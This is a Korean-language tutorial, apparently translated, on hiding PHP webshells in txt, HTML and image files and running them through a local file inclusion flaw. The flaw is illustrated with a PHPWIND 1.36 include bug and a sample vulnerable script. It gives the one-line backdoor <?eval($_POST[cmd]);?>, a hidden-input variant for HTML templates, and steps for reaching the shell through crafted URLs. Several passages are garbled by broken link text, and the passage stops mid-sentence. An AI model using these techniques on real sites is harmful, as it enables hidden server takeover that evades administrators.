PHP 문을 이미지에 넣으면 어쨌든 실행되지 않는다는 점을 알아야 합니다. 왜냐하면 PHP는 확장자가 php인 파일만 구문 분석하기 때문입니다. 그래서 그림에 숨겨진 PHP문을 실행할 수 있어야 합니다. 우리는 단지 PHP의 호출 함수(include, require 등)를 사용합니다.
우리는 며칠 전 사진에 트로이 목마를 숨겼다는 기사를 아직도 기억합니다. 즉, PHP 파일에 있는 include("x.gif")와 같은 문을 사용하여 이미지에 숨겨진 트로이 목마 문을 호출합니다. ASP의 명령문은 유사합니다. 굉장히 숨겨져 있는 것 같지만, 이미지를 직접 불러오면 PHP에 대해 조금 아는 사람이라도 의심스러운 점을 발견하는 것은 어렵지 않을 것입니다. URL에서는 GET 방식으로 매개변수를 전달하기 어렵기 때문에 트로이목마 삽입 성능을 충분히 활용하지 못한다.
include 함수는 PHP에서 자주 사용되므로 보안 문제가 너무 많이 발생합니다. 예를 들어 PHPWIND1.36의 취약점은 include 뒤에 변수 필터링이 부족하여 발생합니다. 이를 통해 유사한 명령문을 구성하여 PHP 파일에 삽입할 수 있습니다. 그런 다음 사진이나 HTML 파일에 트로이 목마를 숨기면 더 은폐된다고 할 수 있습니다. 예를 들어 PHPWIND 포럼에 다음 문을 삽입합니다. < ''?@include includ/.$PHPWIND_ROOT;? < mailto:?@include 'includ/'.$PHPWIND_ROOT;?>>일반 관리자는 볼 수 없습니다.
포함 기능의 도움으로 txt, html 및 이미지 파일과 같은 다양한 유형의 파일에서 PHP 트로이 목마를 숨길 수 있습니다. 이 세 가지 유형의 파일인 txt, html 및 이미지 파일은 포럼 및 기사 시스템에서 가장 일반적이므로 아래 순서대로 테스트를 수행합니다.
먼저 PHP 파일 test.php를 만듭니다. 파일 내용은 다음과 같습니다.
<?php
$test=$_GET['테스트'];
@include 'test/'.$test;
?>
Txt 파일은 일반적으로 설명 파일이므로 디렉토리의 설명 파일에 한 문장의 트로이 목마를 넣을 수 있습니다. TXT 파일 t.txt를 만드세요. Trojan <?eval($_POST[cmd]);?> 문장을 t.txt 파일에 붙여넣습니다. 그런 다음 http://localhost/test/test.php?test=../t.txt < http://localhost/phpw/index.php?PHPWIND_ROOT=../robots.txt >를 방문하세요. txt의 내용이 괜찮은 것으로 판명되면 랭커 마이크로 PHP 백도어 클라이언트 트로이 목마 주소를 http://localhost/test/test.php?test=../t.txt < http://localhost/phpw/ index.php? PHPWIND_ROOT=../robots.txt > 비밀번호에 cmd만 추가하면 실행 결과를 확인할 수 있습니다.
HTML 파일의 경우 일반적으로 템플릿 파일입니다. HTML 파일에 삽입된 트로이 목마가 표시되지 않고 호출되어 실행될 수 있도록 하기 위해 HTML에 다음과 같은 숨겨진 속성이 있는 텍스트 상자를 추가할 수 있습니다. <input type=hidden value="<?eval($ _POST[cmd ]);?>"> 그런 다음 위와 동일한 방법을 사용합니다. 실행의 반환 결과는 일반적으로 소스 파일을 보면 확인할 수 있습니다. 예를 들어, 이 프로그램의 디렉토리를 보는 기능을 사용하십시오. 소스 파일 내용을 <input type=hidden value="C:Uniserver2_7swwwtest">로 봅니다. 디렉터리를 C:Uniserver2_7swwwtest로 가져올 수 있습니다.
이제 이미지 파일에 대해 이야기해 보겠습니다. 가장 위험한 방법은 이미지에 트로이 목마를 숨기는 것입니다. 사진을 직접 편집하고 사진 끝에 <?eval($_POST[cmd]);?>를 삽입할 수 있습니다.
테스트 후에는 일반적으로 사진에 영향을 미치지 않습니다. 그런 다음 같은 방법으로 클라이언트 트로이 목마 주소를 추가하세요<